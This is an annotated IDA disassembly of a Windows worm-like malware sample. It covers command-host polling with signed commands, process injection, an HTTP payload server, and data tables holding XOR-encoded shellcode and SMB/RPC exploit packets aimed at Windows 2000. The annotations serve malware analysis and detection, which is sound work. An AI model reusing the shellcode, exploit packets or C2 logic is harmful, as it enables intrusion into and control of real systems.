ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_310028FE mov edi, [ebp+arg_0] push ebx loc_310028B6: ; CODE XREF: sub_310028A1+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_3100281C mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_310028E2 cmp bl, 7Ah jg short loc_310028E2 movsx esi, bl sub esi, 61h loc_310028E2: ; CODE XREF: sub_310028A1+34j ; sub_310028A1+39j cmp bl, 41h jl short loc_310028F2 cmp bl, 5Ah jg short loc_310028F2 movsx esi, bl sub esi, 41h 
loc_310028F2:                           ; CODE XREF: sub_310028A1+44j
                                        ; sub_310028A1+49j
                                        ; Tail of sub_310028A1 (its entry and the
                                        ; loop body are above this view): keep
                                        ; looping while the byte at [arg_4]
                                        ; (presumably advanced in the loop body)
                                        ; is non-zero, otherwise NUL-terminate the
                                        ; output at edi and return.
        mov     eax, [ebp+arg_4]
        mov     al, [eax]
        test    al, al
        jnz     short loc_310028B6      ; more input -> continue (target above this view)
        pop     ebx
        jmp     short loc_31002901
; ---------------------------------------------------------------------------
loc_310028FE:                           ; CODE XREF: sub_310028A1+Fj
        mov     edi, [ebp+arg_0]        ; early-out path: terminate at the start of arg_0
loc_31002901:                           ; CODE XREF: sub_310028A1+5Bj
        and     byte ptr [edi], 0       ; *edi = 0
        pop     edi
        pop     esi
        pop     ebp
        retn
sub_310028A1 endp
; =============== S U B R O U T I N E =======================================
; char sub_31002908(const unsigned char *buf)
; Checksum letter over a fixed 30h-byte (48-byte) block.
; Sums buf[0..2Fh] as unsigned bytes (movzx), reduces the sum modulo 1Ah (26)
; and adds 61h ('a'), so the result is always a lowercase letter 'a'..'z'.
; The sum is at most 48*255, so the signed cdq/idiv never yields a negative
; remainder.  sub_31002928 compares this letter with the byte that follows the
; '~' separator in a received command: it is a cheap integrity check on the
; 48-byte field, not an authentication of it.
; In:    [esp+4] = buf (at least 30h readable bytes)
; Out:   eax = 'a' + (sum(buf[0..2Fh]) mod 26)
; Clobb: ecx, edx, flags
sub_31002908 proc near                  ; CODE XREF: sub_31002928+A6p
arg_0 = dword ptr 4
        xor     eax, eax                ; eax = running sum
        xor     ecx, ecx                ; ecx = byte index
loc_3100290C:                           ; CODE XREF: sub_31002908+12j
        mov     edx, [esp+arg_0]
        movzx   edx, byte ptr [ecx+edx] ; unsigned byte, so high bytes never contribute
        add     eax, edx
        inc     ecx
        cmp     ecx, 30h                ; 48 bytes exactly, independent of any terminator
        jl      short loc_3100290C
        push    1Ah
        cdq                             ; edx:eax = sum (non-negative)
        pop     ecx                     ; ecx = 26
        idiv    ecx                     ; edx = sum mod 26
        mov     eax, edx
        add     eax, 61h                ; map 0..25 -> 'a'..'z'
        retn
sub_31002908 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int sub_31002928(char *response)
; Parses and validates one command embedded in an HTTP response body.  The
; layout the checks below impose, counting from the "zer0" marker, is:
;     "zer0" <k> <text ...> '~' <c> <field ...>
;   k     a lowercase letter; k-'a' (0..25) is passed to sub_310028A1
;         together with <text>, whose result is the 256-byte var_13C
;   c     must equal the checksum letter sub_31002908 computes over the
;         48-byte var_3C that sub_310027C0 derives from <field>
; The text after the marker must be longer than 50h (80) chars and is
; force-terminated at 100h (256) bytes (var_13C is exactly 100h bytes).
; If every check passes, the 44h-byte PUBLICKEYBLOB at dword_31004CB4 is
; handed to sub_31001190 (into var_C, an 8-byte slot), sub_310011FB is called
; with the decoded text, its length, the 48-byte field and an output dword,
; and only when it returns 0 AND the output dword is non-zero is
; sub_310026A6 run on the decoded text.  sub_310011DF then releases var_C.
; The helpers are not visible here; given the imported CryptImportKey /
; CryptVerifySignatureA and the 384-bit key blob, the 48-byte field is most
; likely an RSA signature over the text — confirm in sub_310011FB.
; Out:   eax = 1 on any failed check (the default), 0 only on the full path.
; Stack: var_13C (100h bytes) decoded text, var_3C (30h bytes) signature
;        field, var_C (8 bytes) crypto handles, var_4 result, arg_0 reused
;        for k and later as the output dword of sub_310011FB.
sub_31002928 proc near                  ; CODE XREF: sub_31002A44+DAp
var_13C = byte ptr -13Ch
var_3C = byte ptr -3Ch
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
        push    ebp
        mov     ebp, esp
        sub     esp, 13Ch
        push    esi
        push    edi
        push    offset aZer0            ; "zer0"
        mov     [ebp+var_4], 1          ; default result: failure
        push    [ebp+arg_0]
        call    dword_310010F4          ; strstr
        mov     edi, eax                ; edi = position of "zer0" in the response
        pop     ecx
        test    edi, edi
        pop     ecx
        jz      loc_31002A3D            ; no marker -> fail
        add     edi, 4                  ; skip the 4-byte marker
        jz      loc_31002A3D            ; effectively dead: only if edi+4 wrapped to 0
        push    edi
        call    dword_3100107C          ; lstrlenA
        cmp     eax, 50h
        jle     loc_31002A3D            ; require more than 80 chars after the marker
        movsx   eax, byte ptr [edi]     ; k = first char after the marker
        and     byte ptr [edi+100h], 0  ; cap the command at 256 bytes (see var_13C size);
                                        ; lands inside the caller's 4000h-byte buffer because
                                        ; the marker is only searched in its first 2000h bytes
        sub     eax, 61h                ; k -= 'a'
        mov     [ebp+arg_0], eax
        js      loc_31002A3D            ; k < 'a' -> fail
        cmp     eax, 1Ah
        jge     loc_31002A3D            ; k > 'z' -> fail
        inc     edi                     ; edi = start of <text>
        push    7Eh                     ; '~'
        push    edi
        call    dword_310010EC          ; strchr
        mov     esi, eax                ; esi = position of '~'
        pop     ecx
        test    esi, esi
        pop     ecx
        jz      loc_31002A3D            ; no separator -> fail
        push    ebx                     ; ebx is callee-saved; used to stash the '~'
        mov     bl, [esi]
        push    [ebp+arg_0]             ; k (0..25)
        and     byte ptr [esi], 0       ; temporarily terminate <text> at '~'
        lea     eax, [ebp+var_13C]
        push    edi                     ; <text>
        push    eax                     ; out: var_13C
        call    sub_310028A1            ; sub_310028A1(var_13C, text, k) — body not visible here
        xor     edi, edi                ; edi = 0 from here on
        lea     eax, [ebp+var_3C]
        push    edi                     ; 0
        push    eax                     ; out: var_3C (48 bytes)
        lea     eax, [esi+2]            ; <field> starts after '~' and the checksum letter
        mov     [esi], bl               ; restore the '~'
        push    eax
        call    sub_310027C0            ; sub_310027C0(field, var_3C, 0) — presumably decodes field into 48 bytes
        lea     eax, [ebp+var_3C]
        push    eax
        call    sub_31002908            ; al = checksum letter of var_3C
        add     esp, 1Ch                ; 0Ch + 0Ch + 4 bytes of arguments
        cmp     [esi+1], al             ; must match the letter c after '~'
        pop     ebx
        jnz     short loc_31002A3D
        push    44h                     ; 68 bytes = 20-byte header + 48-byte modulus of the blob
        lea     eax, [ebp+var_C]
        push    offset dword_31004CB4   ; embedded PUBLICKEYBLOB (CALG_RSA_SIGN, 384 bit)
        push    eax
        call    sub_31001190            ; sub_31001190(var_C, blob, 44h) — presumably imports the key
        add     esp, 0Ch
        lea     eax, [ebp+arg_0]
        push    eax                     ; out dword (arg_0 reused)
        lea     eax, [ebp+var_3C]
        push    30h                     ; 48 = length of the field
        push    eax                     ; var_3C
        lea     eax, [ebp+var_13C]
        push    eax
        call    dword_3100107C          ; lstrlenA
        push    eax                     ; len(var_13C)
        lea     eax, [ebp+var_13C]
        push    eax                     ; var_13C
        lea     eax, [ebp+var_C]
        push    eax                     ; var_C
        call    sub_310011FB            ; sub_310011FB(var_C, text, len, field, 30h, &out)
        add     esp, 18h
        test    eax, eax
        jnz     short loc_31002A33      ; non-zero return -> skip action
        cmp     [ebp+arg_0], edi        ; out == 0 -> skip action
        jz      short loc_31002A33
        lea     eax, [ebp+var_13C]
        push    eax
        call    sub_310026A6            ; act on the validated text (body not visible here)
        pop     ecx
        mov     [ebp+var_4], edi        ; result = 0 (success)
loc_31002A33:                           ; CODE XREF: sub_31002928+F4j
                                        ; sub_31002928+F9j
        lea     eax, [ebp+var_C]
        push    eax
        call    sub_310011DF            ; release whatever sub_31001190 set up in var_C
        pop     ecx
loc_31002A3D:                           ; CODE XREF: sub_31002928+26j
                                        ; sub_31002928+2Fj ...
        mov     eax, [ebp+var_4]
        pop     edi
        pop     esi
        leave
        retn
sub_31002928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_31002A44(const char *host, char full_checkin)
; One poll of a command host: builds a URL, fetches it with WinINet and hands
; the body to sub_31002928 when it contains the "zer0" marker.
;   full_checkin != 0 -> "http://%s/index.php?id=%s?scn=%d?inf=%d?ver=13?cnt=%s"
;                        filled with host, "dfashnzdsdl", dword_31004FD4 (scn),
;                        dword_31004FBC (inf) and the locale string fetched
;                        below (cnt)
;   full_checkin == 0 -> "http://%s" with host only
; The query joins its parameters with '?' instead of '&', and the User-Agent
; is the fixed aMozilla4_0Co_0 string — both usable as network signatures.
; None of the WinINet return values is checked: a NULL handle or a failed
; read still reaches the marker scan, which then inspects whatever the buffer
; from sub_31002680 holds (presumably zero-filled — not visible here).
; Stack: var_E8 (64h bytes) locale text, var_84 (80h bytes) URL,
;        var_4 bytes-read output.  arg_0/arg_4 are overwritten after the
;        wsprintfA calls to hold the InternetOpenA / InternetOpenUrlA handles.
; Regs:  edi = 4000h-byte buffer from sub_31002680, released via sub_31002694;
;        ebx = 0, then the scan offset; esi = 2000h read limit, then
;        InternetCloseHandle.
sub_31002A44 proc near                  ; CODE XREF: UPX0:31002B54p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
        push    ebp
        mov     ebp, esp
        sub     esp, 0E8h
        push    ebx
        push    esi
        push    edi
        push    4000h
        call    sub_31002680            ; edi = buffer of 4000h bytes (allocator not visible here)
        pop     ecx
        mov     edi, eax
        lea     eax, [ebp+var_E8]
        push    63h                     ; cchData = 99 (var_E8 is 64h bytes)
        push    eax
        push    7                       ; LCType 7 = LOCALE_SABBREVCTRYNAME (abbreviated country name)
        push    400h                    ; LOCALE_USER_DEFAULT
        call    dword_31001040          ; GetLocaleInfoA
        xor     ebx, ebx
        cmp     byte ptr [ebp+arg_4], bl
        jz      short loc_31002AAC      ; flag clear -> bare "http://%s"
        lea     eax, [ebp+var_E8]
        push    eax                     ; cnt=%s  <- country name
        lea     eax, [ebp+var_84]
        push    dword_31004FBC          ; inf=%d
        push    dword_31004FD4          ; scn=%d
        push    offset aDfashnzdsdl     ; "dfashnzdsdl"  -> id=%s
        push    [ebp+arg_0]             ; host -> first %s
        push    offset aHttpSIndex_php  ; "http://%s/index.php?id=%s?scn=%d?inf=%d"...
        push    eax                     ; var_84 (80h bytes; wsprintfA does not bound it)
        call    dword_3100111C          ; wsprintfA
        add     esp, 1Ch
        jmp     short loc_31002AC4
; ---------------------------------------------------------------------------
loc_31002AAC:                           ; CODE XREF: sub_31002A44+34j
        push    [ebp+arg_0]
        lea     eax, [ebp+var_84]
        push    offset aHttpS           ; "http://%s"
        push    eax
        call    dword_3100111C          ; wsprintfA
        add     esp, 0Ch
loc_31002AC4:                           ; CODE XREF: sub_31002A44+66j
        push    ebx                     ; dwFlags = 0
        push    ebx                     ; lpszProxyBypass = NULL
        push    ebx                     ; lpszProxy = NULL
        push    ebx                     ; dwAccessType = 0
        push    offset aMozilla4_0Co_0  ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
        call    dword_3100112C          ; InternetOpenA
        push    ebx                     ; dwContext = 0
        push    ebx                     ; dwFlags = 0
        push    ebx                     ; dwHeadersLength = 0
        lea     ecx, [ebp+var_84]
        push    ebx                     ; lpszHeaders = NULL
        push    ecx                     ; URL
        push    eax                     ; hInternet (unchecked)
        mov     [ebp+arg_0], eax        ; arg_0 now holds the InternetOpenA handle
        call    dword_31001128          ; InternetOpenUrlA
        lea     ecx, [ebp+var_4]
        mov     esi, 2000h
        push    ecx                     ; &bytes read (never examined)
        push    esi                     ; read at most 2000h of the 4000h buffer
        push    edi
        push    eax                     ; hUrl (unchecked)
        mov     [ebp+arg_4], eax        ; arg_4 now holds the InternetOpenUrlA handle
        call    dword_31001124          ; InternetReadFile
loc_31002AFD:                           ; CODE XREF: sub_31002A44+D3j
                                        ; scan buffer[0..1FFFh] for "zer0"; reads stay within 2003h
        lea     eax, [ebx+edi]
        push    4
        push    eax
        push    offset aZer0_0          ; "zer0"
        call    sub_31002BD6            ; memcmp
        add     esp, 0Ch
        test    eax, eax
        jz      short loc_31002B1B
        inc     ebx
        cmp     ebx, esi
        jl      short loc_31002AFD
        jmp     short loc_31002B24      ; no marker in the response
; ---------------------------------------------------------------------------
loc_31002B1B:                           ; CODE XREF: sub_31002A44+CEj
        add     ebx, edi                ; ebx = pointer to the marker
        push    ebx
        call    sub_31002928            ; validate and act on the command; result ignored
        pop     ecx
loc_31002B24:                           ; CODE XREF: sub_31002A44+D5j
        push    edi
        call    sub_31002694            ; release the buffer
        mov     esi, dword_31001130
        pop     ecx
        push    [ebp+arg_4]
        call    esi                     ; InternetCloseHandle (hUrl)
        push    [ebp+arg_0]
        call    esi                     ; InternetCloseHandle (hInternet)
        pop     edi
        pop     esi
        pop     ebx
        leave
        retn
sub_31002A44 endp
; ---------------------------------------------------------------------------
; Polling loop.  Not a proc in IDA; its address is taken by sub_31001E06, so
; it presumably runs as its own thread — confirm there.  The esi pushed on
; entry is never popped: the loop has no exit.
; Walks the 5-byte-stride table at byte_31004D34 — {byte flag, dword pointer
; to a host string}: byte_31004D34[i*5] is passed as the full_checkin flag and
; off_31004D35[i*5] as the host to sub_31002A44.  i starts at 2 and advances
; by 2 + rand() % 3 per iteration, so entries are skipped pseudo-randomly;
; when i reaches 14h (20) it restarts at 0.  Between polls it sleeps
; (sub_31001AC9() mod 493E0h) + 61B48h ms = 400200..700199 ms, roughly
; 6.7 to 11.7 minutes (sub_31001AC9 presumably returns a random value).
loc_31002B40:                           ; DATA XREF: sub_31001E06+E9o
        push    esi
loc_31002B41:                           ; CODE XREF: UPX0:31002B89j
        xor     esi, esi                ; i = 0
loc_31002B43:                           ; CODE XREF: UPX0:31002B87j
        inc     esi
        inc     esi                     ; i += 2
        mov     al, byte_31004D34[esi+esi*4] ; flag byte of entry i (stride 5)
        push    eax
        push    off_31004D35[esi+esi*4] ; host pointer of entry i
        call    sub_31002A44
        pop     ecx
        pop     ecx
        call    dword_310010F8          ; rand
        push    3
        cdq
        pop     ecx
        idiv    ecx                     ; edx = rand() % 3
        add     esi, edx                ; i += 0..2
        call    sub_31001AC9
        xor     edx, edx
        mov     ecx, 493E0h             ; 300000
        div     ecx                     ; edx = value mod 300000
        add     edx, 61B48h             ; + 400200 ms
        push    edx
        call    dword_31001080          ; Sleep
        cmp     esi, 14h
        jb      short loc_31002B43
        jmp     short loc_31002B41      ; wrap around and start over
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Tail-jump through the resolved-address slot dword_31001108 (its import name
; is not visible in this view); called from sub_31001262.
sub_31002B8C proc near                  ; CODE XREF: sub_31001262+128p
                                        ; sub_31001262+134p ...
        jmp     dword_31001108
sub_31002B8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Tail-jump through slot dword_31001104 (name not visible here).
sub_31002B92 proc near                  ; CODE XREF: sub_31001262+9Cp
                                        ; sub_31001262+C5p ...
        jmp     dword_31001104
sub_31002B92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Tail-jump through slot dword_31001100 (name not visible here).
sub_31002B98 proc near                  ; CODE XREF: sub_31001262+93p
                                        ; sub_31001262+B2p ...
        jmp     dword_31001100
sub_31002B98 endp
; ---------------------------------------------------------------------------
        align 10h
; =============== S U B R O U T I N E =======================================
; Stack probe in the shape of MSVC's _chkstk / _alloca_probe.
; In:    eax = number of bytes to reserve on the stack
; Touches one dword in every 1000h-byte page below the caller's esp so the
; guard page is committed in order, then lowers esp by eax and returns to
; the caller through the saved return address.  ecx is preserved, eax is
; restored from the return-address slot.  Called at sub_31001262+8 for that
; function's large frame.
sub_31002BA0 proc near                  ; CODE XREF: sub_31001262+8p
arg_0 = byte ptr 4
        push    ecx
        cmp     eax, 1000h
        lea     ecx, [esp+4+arg_0]      ; ecx = caller's esp (above the return address)
        jb      short loc_31002BC0      ; less than one page: no probing needed
loc_31002BAC:                           ; CODE XREF: sub_31002BA0+1Ej
        sub     ecx, 1000h
        sub     eax, 1000h
        test    [ecx], eax              ; touch the page
        cmp     eax, 1000h
        jnb     short loc_31002BAC
loc_31002BC0:                           ; CODE XREF: sub_31002BA0+Aj
        sub     ecx, eax                ; ecx = final esp
        mov     eax, esp
        test    [ecx], eax              ; touch the last page
        mov     esp, ecx
        mov     ecx, [eax]              ; restore saved ecx
        mov     eax, [eax+4]            ; return address
        push    eax
        retn
sub_31002BA0 endp
; ---------------------------------------------------------------------------
        align 10h
; Jump through the slot at loc_310010F0 (inside the resolved-address table;
; its name is not visible here).  Its address is taken by sub_31001E06.
loc_31002BD0:                           ; DATA XREF: sub_31001E06+Ao
        jmp     dword ptr loc_310010F0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; memcmp thunk (the call site in sub_31002A44 annotates it as memcmp).
sub_31002BD6 proc near                  ; CODE XREF: sub_31002A44+C4p
        jmp     dword_310010E8
sub_31002BD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; KERNEL32.Process32Next (dword_31001074 per the resolved-import table).
; sub_31002310 calls this and the two thunks below, so it walks the process
; list; what it does with each entry is not visible here.
sub_31002BDC proc near                  ; CODE XREF: sub_31002310+ABp
        jmp     dword_31001074
sub_31002BDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; KERNEL32.Process32First (dword_3100106C).
sub_31002BE2 proc near                  ; CODE XREF: sub_31002310+64p
        jmp     dword_3100106C
sub_31002BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; KERNEL32.CreateToolhelp32Snapshot (dword_31001068).
sub_31002BE8 proc near                  ; CODE XREF: sub_31002310+2Dp
        jmp     dword_31001068
sub_31002BE8 endp
;
--------------------------------------------------------------------------- db 2 dup(0CCh) dd 504h dup(0) byte_31004000 db 0EBh ; DATA XREF: sub_31001262+24Eo ; sub_31001262+260o ... db 58h word_31004002 dw 7468h ; DATA XREF: sub_310020F4+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999AAh, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 
9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_310042C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_31001262+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_31004354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 10h dword_31004400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_310044E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_31001262+BFo unicode 0, <C$>,0 a????? 
db '?????',0 dd 0 dword_31004544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_310045B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_31004654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_310046D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31004768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_310047D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31001262+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31004848 dd 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31004906 dd 1004600h dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31004940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah 
dup(0) ; DATA XREF: sub_31001262+41Bo ; sub_31001262+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_310049B8: ; DATA XREF: sub_31001262+44Ao jmp short loc_310049C0 ; --------------------------------------------------------------------------- jmp short loc_310049C2 ; --------------------------------------------------------------------------- align 10h loc_310049C0: ; CODE XREF: UPX0:loc_310049B8j ; DATA XREF: sub_31001262+5Co pop esp pop esp loc_310049C2: ; CODE XREF: UPX0:310049BAj and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_310049CC dd 1CEC8166h dword_310049D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_310017C9+62o align 4 aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_310017C9+39o align 10h aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_310017C9+2Ao align 4 aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_310017C9+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_310017C9+8o ; sub_31001E06+BAo align 4 aUterm13 db 'uterm13',0 ; DATA XREF: sub_31001851:loc_31001936o ; UPX0:31001DA5o ... aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31001851+58o align 10h aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31001851:loc_31001898o align 4 aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31001851+34o align 4 aKernel32 db 'kernel32',0 ; DATA XREF: sub_31001851+18o align 10h dword_31004A80 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+F9o db 0Dh,0Ah db 0Dh,0Ah,0 align 4 aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31001ADF+85o db 0Dh,0Ah,0 align 4 aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 4 a_exe db '.exe',0 ; DATA XREF: sub_31001ADF+55o ; sub_31002476+4Bo ... 
        align 4
; Request method matched by sub_31001ADF, which also owns the
; "HTTP/1.1 200 OK" / "Content-Type: application/x-exe-compressed" response
; templates above — i.e. the sample answers GET requests itself.
aGet            db 'GET',0              ; DATA XREF: sub_31001ADF+3Do
; File name used by the code at 31001D90 (not a proc in IDA).
aFtpupd_exe     db 'ftpupd.exe',0       ; DATA XREF: UPX0:31001D90o
        align 4
; Module names resolved at runtime by sub_31001E06 (see also aAdvapi32 above).
aUser32         db 'user32',0           ; DATA XREF: sub_31001E06+C1o
        align 4
aMsvcrt         db 'msvcrt',0           ; DATA XREF: sub_31001E06+B3o
        align 4
aWininet        db 'wininet',0          ; DATA XREF: sub_31001E06+ACo
aWs2_32         db 'ws2_32',0           ; DATA XREF: sub_31001E06+9Fo
        align 4
; "u8".."u13x": short names referenced only from sub_31001E06, in the same
